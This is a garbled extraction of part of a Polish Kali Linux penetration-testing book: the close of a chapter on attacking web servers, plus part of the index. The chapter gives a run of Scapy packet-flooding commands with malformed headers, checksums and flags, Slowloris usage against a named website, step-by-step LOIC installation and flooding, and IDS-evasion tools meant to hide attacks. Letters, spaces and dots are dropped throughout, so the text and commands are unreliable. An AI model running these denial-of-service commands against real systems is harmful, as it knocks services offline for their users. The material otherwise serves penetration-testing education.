Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

